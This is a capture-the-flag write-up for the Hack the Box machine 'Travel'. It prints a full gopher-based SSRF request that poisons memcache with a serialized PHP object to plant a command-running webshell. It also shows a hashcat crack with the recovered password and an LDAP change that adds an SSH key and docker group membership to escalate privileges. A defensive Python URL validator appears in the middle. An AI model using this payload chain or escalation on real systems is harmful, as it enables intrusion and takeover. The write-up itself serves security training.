Hack the Box: Travel

Travel

User

Main page
Blog subdomain
Awesome RSS
Blog-dev subdomain
Dumping .git repo
Repo content
README.md file
Debug comment
Sending payload
Memcache write confirmation
A part of key
Memcache key
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty`
../../uploads/payload.php
Gopherus memcache generation
GET /awesome-rss/?debug=1&custom_feed_url=gopher://127.00.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20443%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22%00TemplateHelper%00file%22%3Bs:28:%22%2E%2E/%2E%2E/%2E%2E/uploads/payload.php%22%3Bs:20:%22%00TemplateHelper%00data%22%3Bs:316:%22%3B%3Chtml%3E%3Cbody%3E%3Cform%20method%3D%22GET%22%20name%3D%22%3C%3Fphp%20echo%20basename%28%24_SERVER%5B%27PHP_SELF%27%5D%29%3B%20%3F%3E%22%3E%3Cinput%20type%3D%22TEXT%22%20name%3D%22cmd%22%20id%3D%22cmd%22%20size%3D%2280%22%3E%3Cinput%20type%3D%22SUBMIT%22%20value%3D%22Execute%22%3E%3C/form%3E%3Cpre%3E%3C%3Fphp%20%20%20%20if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%7Bsystem%28%24_GET%5B%27cmd%27%5D%29%3B%7D%3F%3E%3C/pre%3E%3C/body%3E%3Cscript%3Edocument.getElementById%28%22cmd%22%29.focus%28%29%3B%3C/script%3E%3C/html%3E%22%3B%7D%0d%0a HTTP/1.1
Host: blog.travel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Webshell
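The request above gets through because the feed fetcher accepts any URL scheme and its loopback filter is fooled by the 127.00.0.1 spelling. As an added example (not code from the box, the theme or the original writeup, and written in Python rather than the theme's PHP, with function names chosen here), this is the server-side check a defender would want: only http/https, and every IPv4 literal canonicalised through inet_aton so octal octets and plain-integer forms collapse to the same address before the private-range test.

```python
"""Validate a user-supplied feed URL before fetching it (defensive example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def canonical_ipv4(host):
    """Dotted-quad for any literal inet_aton accepts (octal octets such as
    '127.00.0.1', short forms such as '127.1', or a bare 32-bit integer);
    None if the host is not an IPv4 literal at all."""
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return None


def resolve_host(host):
    """All addresses the host stands for: the literal itself, or DNS answers."""
    literal = canonical_ipv4(host)
    if literal is not None:
        return [ipaddress.ip_address(literal)]
    try:
        return [ipaddress.ip_address(host)]  # IPv6 literal
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def feed_url_rejection(url):
    """Return None if the URL may be fetched, otherwise a short reason.
    Every resolved address must be globally routable, so loopback (the
    memcache target above), RFC 1918 and link-local space are all refused."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme not allowed: " + (parts.scheme or "(none)")
    host = parts.hostname
    if not host:
        return "no host"
    addrs = resolve_host(host)
    if not addrs:
        return "unresolvable host"
    for addr in addrs:
        if not addr.is_global:
            return "non-public address " + str(addr)
    return None
```

Hostname lookups go through getaddrinfo, so a name that resolves to 127.0.0.1 is refused the same way a literal is.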

User

Wordpress backup
Lynik-admin hash
# hashcat.exe -m400 -a0 hashes.txt rockyou.txt
-- snip --
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
User flag

Root

.ldaprc
hosts file
LDAP password
# ssh lynik-admin@travel.htb -D 1080
# proxychains4 ldapsearch -x -o ldif-wrap=no -h 172.20.0.10 -b "dc=travel,dc=htb" -D 'cn=lynik-admin,dc=travel,dc=htb' -W
-- snip --
# travel.htb
dn: dc=travel,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: Travel.HTB
dc: travel
-- snip --
# linux, servers, travel.htb
dn: ou=linux,ou=servers,dc=travel,dc=htb
description: Linux Servers
objectClass: organizationalUnit
ou: linux
-- snip --
# jane, users, linux, servers, travel.htb
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: jane
uidNumber: 5005
homeDirectory: /home/jane
givenName: Jane
gidNumber: 5000
sn: Rodriguez
cn: Jane Rodriguez
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash
-- snip --
$ cat /etc/group
root:x:0:
-- snip --
docker:x:117:
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa 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 tellico@htb
-
replace: gidNumber
gidNumber: 117
Access as Jane
List of docker images
Root flag
